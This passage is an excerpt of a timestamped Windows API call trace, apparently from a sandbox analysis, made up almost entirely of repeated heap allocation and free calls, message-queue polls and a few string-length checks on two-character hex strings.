0x24a9018 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9030 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10f8 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9048 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9060 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9078 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90a8 [0133.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90f0 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1118 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9108 [0133.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90a8 | out: hHeap=0x25c0000) returned 1 [0133.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0133.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0133.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0133.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0133.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.396] lstrlenW (lpString="6B") returned 2 [0133.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90f0 | out: hHeap=0x25c0000) returned 1 [0133.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9108 | out: hHeap=0x25c0000) returned 1 [0133.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9060 | out: hHeap=0x25c0000) returned 1 [0133.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9048 [0133.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9060 [0133.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10f8 [0133.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9030 | out: hHeap=0x25c0000) returned 1 [0133.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9018 | out: hHeap=0x25c0000) returned 1 [0133.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9060 | out: hHeap=0x25c0000) returned 1 [0133.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.397] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.397] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10f8 [0133.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9048 [0133.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9060 [0133.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10e8 [0133.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9018 [0133.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9030 [0133.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9108 [0133.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90f0 [0133.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9078 [0133.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0133.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0133.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0133.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1108 [0133.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90a8 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90f0 | out: hHeap=0x25c0000) returned 1 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9108 | out: hHeap=0x25c0000) returned 1 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.398] lstrlenW (lpString="65") returned 2 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90a8 | out: hHeap=0x25c0000) returned 1 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9030 | out: hHeap=0x25c0000) returned 1 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9018 | out: hHeap=0x25c0000) returned 1 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9018 [0133.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9030 [0133.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10e8 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9060 | out: hHeap=0x25c0000) returned 1 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9030 | out: hHeap=0x25c0000) returned 1 [0133.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9018 | out: hHeap=0x25c0000) returned 1 [0133.399] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.399] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10e8 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9018 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9030 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10f8 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9048 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9060 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90a8 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9108 [0133.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90f0 [0133.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1118 [0133.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9078 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9108 | out: hHeap=0x25c0000) returned 1 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90a8 | out: hHeap=0x25c0000) returned 1 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.400] lstrlenW (lpString="72") returned 2 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90f0 | out: hHeap=0x25c0000) returned 1 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9060 | out: hHeap=0x25c0000) returned 1 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9048 [0133.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9060 [0133.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10f8 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9030 | out: hHeap=0x25c0000) returned 1 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9018 | out: hHeap=0x25c0000) returned 1 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9060 | out: hHeap=0x25c0000) returned 1 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.400] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.400] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10f8 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9048 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9060 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10e8 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9018 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9030 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9078 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90f0 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90a8 [0133.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1108 [0133.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9108 [0133.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90a8 | out: hHeap=0x25c0000) returned 1 [0133.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90f0 | out: hHeap=0x25c0000) returned 1 [0133.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0133.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0133.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0133.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.402] lstrlenW (lpString="6E") returned 2 [0133.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0133.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9108 | out: hHeap=0x25c0000) returned 1 [0133.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9030 | out: hHeap=0x25c0000) returned 1 [0133.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9018 | out: hHeap=0x25c0000) returned 1 [0133.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9018 [0133.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9030 [0133.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10e8 [0133.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9060 | out: hHeap=0x25c0000) returned 1 [0133.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9030 | out: hHeap=0x25c0000) returned 1 [0133.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9018 | out: hHeap=0x25c0000) returned 1 [0133.402] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.402] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10e8 [0133.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9018 [0133.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9030 [0133.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10f8 [0133.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9048 [0133.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9060 [0133.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9108 [0133.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0133.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9078 [0133.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0133.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0133.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90f0 [0133.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1118 [0133.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90a8 [0133.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0133.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0133.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0133.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0133.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9108 | out: hHeap=0x25c0000) returned 1 [0133.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.403] lstrlenW (lpString="65") returned 2 [0133.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90f0 | out: hHeap=0x25c0000) returned 1 [0133.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90a8 | out: hHeap=0x25c0000) returned 1 [0133.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9060 | out: hHeap=0x25c0000) returned 1 [0133.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9048 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9060 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10f8 [0133.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9030 | out: hHeap=0x25c0000) returned 1 [0133.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9018 | out: hHeap=0x25c0000) returned 1 [0133.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9060 | out: hHeap=0x25c0000) returned 1 [0133.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.404] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.404] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10f8 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9048 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9060 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10e8 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9018 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9030 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90a8 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90f0 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9108 [0133.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0133.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.405] RtlAllocateHeap 